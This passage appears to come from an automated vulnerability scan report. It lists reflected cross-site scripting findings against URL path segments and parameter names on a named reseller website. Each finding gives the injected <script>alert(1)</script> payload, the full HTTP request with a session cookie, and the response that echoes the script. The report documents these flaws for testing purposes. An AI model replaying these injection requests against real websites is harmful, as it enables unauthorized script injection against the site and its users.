The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4c91<script>alert(1)</script>ff818d033ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmosf4c91<script>alert(1)</script>ff818d033ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmosf4c91<script>alert(1)</script>ff818d033ba/ was not found on this server.</p>
...[SNIP]...

2.1411. http://www.resellerbase.com/detail/17/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad1b7<script>alert(1)</script>fdede210638 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/?ad1b7<script>alert(1)</script>fdede210638=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/?ad1b7<script>alert(1)</script>fdede210638=1 was not found on this server.</p>
...[SNIP]...

2.1412. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddf77<script>alert(1)</script>fd225057296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailddf77<script>alert(1)</script>fd225057296/17/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailddf77<script>alert(1)</script>fd225057296/17/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1413. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4eb6<script>alert(1)</script>19767392c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17c4eb6<script>alert(1)</script>19767392c06/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17c4eb6<script>alert(1)</script>19767392c06/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1414. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5e17<script>alert(1)</script>081982733a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesd5e17<script>alert(1)</script>081982733a8/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesd5e17<script>alert(1)</script>081982733a8/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1415. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97feb<script>alert(1)</script>3a6681cf373 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos97feb<script>alert(1)</script>3a6681cf373/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos97feb<script>alert(1)</script>3a6681cf373/images/ was not found on this server.</p>
...[SNIP]...

2.1416. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77cb6<script>alert(1)</script>5215804ab40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images77cb6<script>alert(1)</script>5215804ab40/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images77cb6<script>alert(1)</script>5215804ab40/ was not found on this server.</p>
...[SNIP]...

2.1417. http://www.resellerbase.com/detail/17/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 840c6<script>alert(1)</script>0a8dfb7287a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/?840c6<script>alert(1)</script>0a8dfb7287a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/?840c6<script>alert(1)</script>0a8dfb7287a=1 was not found on this server.</p>
...[SNIP]...

2.1418. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d7c8<script>alert(1)</script>c0bdaa04fb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7d7c8<script>alert(1)</script>c0bdaa04fb8/17/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7d7c8<script>alert(1)</script>c0bdaa04fb8/17/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1419. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2d37<script>alert(1)</script>098d340f6fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17f2d37<script>alert(1)</script>098d340f6fb/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17f2d37<script>alert(1)</script>098d340f6fb/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1420. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e8e22<script>alert(1)</script>29b3acbb467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themese8e22<script>alert(1)</script>29b3acbb467/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themese8e22<script>alert(1)</script>29b3acbb467/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1421. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9aaf3<script>alert(1)</script>99de6b80b41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos9aaf3<script>alert(1)</script>99de6b80b41/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos9aaf3<script>alert(1)</script>99de6b80b41/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1422. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88ddf<script>alert(1)</script>20568e09517 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images88ddf<script>alert(1)</script>20568e09517/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images88ddf<script>alert(1)</script>20568e09517/rating/ was not found on this server.</p>
...[SNIP]...

2.1423. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7d04c<script>alert(1)</script>a28ebdf3e87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating7d04c<script>alert(1)</script>a28ebdf3e87/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating7d04c<script>alert(1)</script>a28ebdf3e87/ was not found on this server.</p>
...[SNIP]...

2.1424. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50f8c<script>alert(1)</script>fbc5d093e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/rating/?50f8c<script>alert(1)</script>fbc5d093e7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/rating/?50f8c<script>alert(1)</script>fbc5d093e7=1 was not found on this server.</p>
...[SNIP]...

2.1425. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50ca8<script>alert(1)</script>181d0f5a1ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50ca8<script>alert(1)</script>181d0f5a1ef/17/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50ca8<script>alert(1)</script>181d0f5a1ef/17/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1426. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 209fe<script>alert(1)</script>f19d0b1e497 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17209fe<script>alert(1)</script>f19d0b1e497/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17209fe<script>alert(1)</script>f19d0b1e497/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1427. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37f3f<script>alert(1)</script>ea4cdde19cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes37f3f<script>alert(1)</script>ea4cdde19cd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes37f3f<script>alert(1)</script>ea4cdde19cd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1428. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 664f6<script>alert(1)</script>775d7889e58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos664f6<script>alert(1)</script>775d7889e58/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos664f6<script>alert(1)</script>775d7889e58/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1429. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3c17e<script>alert(1)</script>56dfc02bed3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images3c17e<script>alert(1)</script>56dfc02bed3/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
